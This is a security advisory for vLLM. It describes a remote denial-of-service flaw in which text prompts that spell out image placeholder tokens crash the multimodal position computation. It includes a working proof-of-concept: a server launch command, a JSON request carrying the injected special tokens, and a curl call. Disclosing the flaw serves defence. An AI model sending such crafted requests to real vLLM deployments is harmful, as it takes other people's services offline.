MEDIUM 6.5

GHSA-hpv8-x276-m59f

vLLM Vulnerable to Remote DoS via Special-Token Placeholders

Details

## Summary This report explains a Token Injection vulnerability in vLLM’s multimodal processing. Unauthenticated, text-only prompts that spell special tokens are interpreted as control. Image and video placeholder sequences supplied without matching data cause vLLM to index into empty grids during input-position computation, raising an unhandled IndexError and terminating the worker or degrading availability. Multimodal paths that rely on `image_grid_thw`/`video_grid_thw` are affected. Severity: High (remote DoS). Reproduced on vLLM 0.10.0 with Qwen2.5-VL.

## Details - Affected component: multimodal input position computation. - File/functions (paths are indicative): - vllm/model_executor/layers/rotary_embedding.py - get_input_positions_tensor(...) - _vl_get_input_positions_tensor(...) - Failure mechanism: - The code counts detected vision tokens and then indexes video_grid_thw/image_grid_thw accordingly. - When user input carries placeholder tokens but no actual multimodal payload, these grids are empty. The code does not bounds-check before indexing.

Representative snippet (context): ```python # vllm/model_executor/layers/rotary_embedding.py @classmethod def _vl_get_input_positions_tensor( cls, input_tokens, hf_config, image_grid_thw, video_grid_thw, ..., ): # detect video tokens video_nums = (vision_tokens == video_token_id).sum() # later in processing t, h, w = ( video_grid_thw[video_index][0], # IndexError if no video data video_grid_thw[video_index][1], video_grid_thw[video_index][2], ) ```

Abbreviated call path: ``` OpenAI API request → vllm.v1.engine.core: step/execute_model → vllm.v1.worker.gpu_model_runner: _update_states/execute_model → vllm.model_executor.layers.rotary_embedding: get_input_positions_tensor → _vl_get_input_positions_tensor → IndexError: list index out of range ```

## PoC ### Environment - vLLM: 0.10.0 - Model: Qwen/Qwen2.5-VL-3B-Instruct - Launch server: ```bash python -m vllm.entrypoints.openai.api_server \ --model Qwen/Qwen2.5-VL-3B-Instruct \ --port 8000 ```

### Request (text-only, no image/video data) ```bash cat > request.json <<'JSON' { "model": "Qwen/Qwen2.5-VL-3B-Instruct", "messages": [ { "role": "user", "content": [ { "type": "text", "text": "what's in picture <|vision_start|><|image_pad|><|vision_end|>" } ] } ] } JSON

curl -s http://127.0.0.1:8000/v1/chat/completions \ -H 'Content-Type: application/json' \ --data @request.json ```

### Observed result - HTTP 500; logs show IndexError: list index out of range from _vl_get_input_positions_tensor(...). - In some deployments, the worker exits and capacity remains reduced until manual restart.

## Impact - Type: Token Injection leading to Remote Denial of Service (unauthenticated). A single request can trigger the fault. - Scope: Any vLLM deployment that serves VLMs and accepts raw user text via OpenAI-compatible endpoints (self-hosted or proxied/managed fronts). - Effect: Request → unhandled exception in position computation → worker termination / service unavailability.

## Fixes

* Changes associated with https://github.com/vllm-project/vllm/issues/32656

## Credits Pengyu Ding (Infra Security, Ant Group) Ziteng Xu (Infra Security, Ant Group)

Are you affected?

Enter the version of the package you're using.

Affected packages

PyPI / vllm

Introduced in: 0.6.1 Fixed in: 0.20.0

Fix pip install --upgrade 'vllm>=0.20.0'

Details

Are you affected?

Affected packages

References